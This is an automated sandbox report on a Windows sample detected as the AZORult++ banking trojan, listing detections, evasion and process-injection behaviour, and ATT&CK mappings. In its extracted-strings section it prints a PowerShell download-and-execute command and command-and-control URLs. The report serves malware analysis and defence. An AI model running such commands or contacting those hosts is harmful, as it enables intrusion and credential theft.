Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
Analysis ID:1428896
MD5:6d36580feee622f41b2ab6bfe79a8f5e
SHA1:93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7
SHA256:3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8
Tags:exe
Infos:

Detection

AZORult++
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeAvira: detected
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeReversingLabs: Detection: 52%
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B882F6 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,0_2_02B882F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B88310 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,0_2_02B88310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B88F70 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_02B88F70
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B86670 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_02B86670
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeString found in binary or memory: http://79.124.78.45/hockamore.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://79.124.78.45/hockamore.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeString found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image/c

E-Banking Fraud

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B88E00 EntryPoint,GetUserDefaultLangID,ExitProcess,0_2_02B88E00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_02B85AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B85E10 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,0_2_02B85E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008FE87D0_2_008FE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B885F00_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B842200_2_02B84220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B846200_2_02B84620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B824F00_2_02B824F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B878300_2_02B87830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B874100_2_02B87410
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: String function: 008F3040 appears 46 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: String function: 008F4480 appears 33 times
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal88.bank.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B861B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_02B861B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B86AA0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,0_2_02B86AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCommand line argument: jhl46745fghb0_2_008F2F40
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeSection loaded: sspicli.dllJump to behavior
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_008F1300

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-11683
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-11784
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeFile opened / queried: C:\Windows\System32\VBoxService.exeJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_02B885F0
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: POST%s|%s|qE2PyNqQStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://79.124.78.45/hockamore.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.clubedasluluzinhasro.com.br/assets/image/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeBinary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeBinary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeBinary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeBinary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeAPI call chain: ExitProcess graph end nodegraph_0-11787
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeAPI call chain: ExitProcess graph end nodegraph_0-10443
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008F695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,0_2_008F1300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F1710 mov ecx, dword ptr fs:[00000030h]0_2_008F1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F75A2 mov eax, dword ptr fs:[00000030h]0_2_008F75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F9763 mov eax, dword ptr fs:[00000030h]0_2_008F9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B87620 mov eax, dword ptr fs:[00000030h]0_2_02B87620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B85E10 mov eax, dword ptr fs:[00000030h]0_2_02B85E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008FA845 GetProcessHeap,0_2_008FA845
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008F3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008F695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008F421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F43AF SetUnhandledExceptionFilter,0_2_008F43AF

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_02B85AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F44C5 cpuid 0_2_008F44C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_008F4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008F4103
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exeCode function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,0_2_02B885F0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Access Token Manipulation
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts21
Native API
Boot or Logon Initialization Scripts1
Process Injection
1
Access Token Manipulation
LSASS Memory231
Security Software Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Account Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
System Owner/User Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync112
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe53%ReversingLabsWin32.Trojan.Azorult
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe100%AviraHEUR/AGEN.1317648
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://www.clubedasluluzinhasro.com.br/assets/imageSecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exefalse
    unknown
    http://79.124.78.45/hockamore.php%temp%SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
      https://www.clubedasluluzinhasro.com.br/assets/image/cSecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://79.124.78.45/hockamore.phpSecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exefalse
          unknown
          No contacted IP infos
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1428896
          Start date and time:2024-04-19 19:29:07 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 3s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:1
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
          Detection:MAL
          Classification:mal88.bank.evad.winEXE@1/0@0/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 5
          • Number of non-executed functions: 66
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • VT rate limit hit for: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
